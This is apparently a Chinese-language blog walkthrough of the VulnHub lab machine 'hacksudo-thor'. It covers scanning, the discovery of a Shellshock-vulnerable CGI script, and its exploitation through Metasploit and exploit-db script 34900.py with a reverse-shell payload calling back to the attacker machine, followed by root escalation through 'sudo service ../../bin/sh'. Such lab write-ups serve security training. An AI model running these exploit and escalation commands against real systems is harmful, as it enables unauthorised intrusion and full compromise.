靶机下载地址: https://www.vulnhub.com/entry/hacksudo-thor,733/
教程链接地址: https://www.cnblogs.com/sainet/p/15801452.html

# 确认攻击目标

攻击机 KALI: 192.168.31.135
靶机 THOR:桥接于 192.168.31.1 的网卡,ip 未知

1)arp 确定靶机地址
sudo arp-scan -l

Image

查看靶机所在 win 主机的 ip 地址
ipconfig | find “192.168.31”

Image

与主机同一 MAC 地址的 ip 地址即为靶机 IP

也可以登陆路由器后台,查看 win 主机上的信息

Image

显示有 win 上所有存在过的 ip 地址,以及其 MAC 地址
-> 靶机 ip:192.168.31.115

2)确认靶机 ip 开放的端口信息
sudo nmap -p- 192.168.31.115

Image

-> 靶机开放端口 21,22,80

# 网站信息收集

打开 http://192.168.31.115 进行信息收集

Image

先对目标网站进行目录扫描

dirsearch -u http://192.168.31.115/

Image

查看目录: http://192.168.31.115/README.md

Image

-> 管理员的用户名是 “admin”,密码是 “password123”。

查看目录: http://192.168.31.115/index.php

Image

-> 输入用户名和密码之后,显示登录失败,可能此密码在其他地方才能登陆

Image

http://192.168.31.115/admin_login.php

Image

-> 成功登陆到对方网站的后台

Image

# SQL 注入测试

翻了翻目录没有什么新的发现

Image

尝试对登陆的地方进行注入

Image

对登陆的地方进行 burp 抓取数据包

Image

复制数据包,用 sqlmap 测试发现没有注入点

Image

# cgi-bin 漏洞

扩大信息收集面,用 dirb 收集更多的目录结构

Image

对收集到的 cgi-bin 目录进行更深一级的搜寻
dirsearch -u http://192.168.31.115/cgi-bin/

Image

-> 敏感目录: http://192.168.31.115/cgi-bin/shell.sh

Image

直接上谷歌搜索 cgi-bin 的漏洞

Image

找到了测试 shellshock 的的命令

Image

nmap -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh 192.168.31.115

Image

-> 确定了此端口存在 CVE-2014-6271 这个漏洞

# msf 攻击 shellshock

利用 msf 寻找此漏洞进行利用

Image
1
2
3
4
5
search CVE-2014-6271
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set rhosts 192.168.31.115
set targeturi /cgi-bin/shell.sh
run
Image

-> 成功拿到网站反弹的 shell

# searchsploit 攻击 shellshock

searchsploit shellshock

Image

searchsploit -x linux/remote/34900.py

Image

cp /usr/share/exploitdb/exploits/linux/remote/34900.py .
python 34900.py
查看此 exp 是如何利用的

Image

根据提示,写全命令行进行攻击

./34900.py payload=reverse rhost=192.168.31.115 lhost=192.168.31.135 lport=5555 pages=/cgi-bin/shell.sh

Image

-> 成功拿到反弹后的 shell

# pspy64s 监控

翻阅目录,查找到一个备份文件,猜测此备份由高权限执行,直接上 pspy 进行监控

Image

将 pspy 从 kali 机器上下载下来,赋予 x 权限,然后执行

Image

等待监控是否执行了一些特殊命令

Image

-> 遗憾的是并没有执行什么特殊任务,不能进行提权

# service 提权

收集服务器的相关信息,sudo -l 确定了可以调用 thor 去执行一个脚本
sudo -u thor /home/thor/./hamer.sh

输入 bash 后反弹出来了一个 thor 用户的 shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

Image

sudo -l 查看 thor 的权限设置,发现其可以直接无密码调用 root 的 service
https://gtfobins.github.io/ 上找到了 service 的提权命令

1
2
3
# service 提权
sudo service ../../bin/sh
python3 -c 'import pty;pty.spawn("/bin/bash")'
Image

-> 提权成功最终拿到了 root 权限

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

.N1h1l157 微信支付

微信支付

.N1h1l157 支付宝

支付宝

.N1h1l157 贝宝

贝宝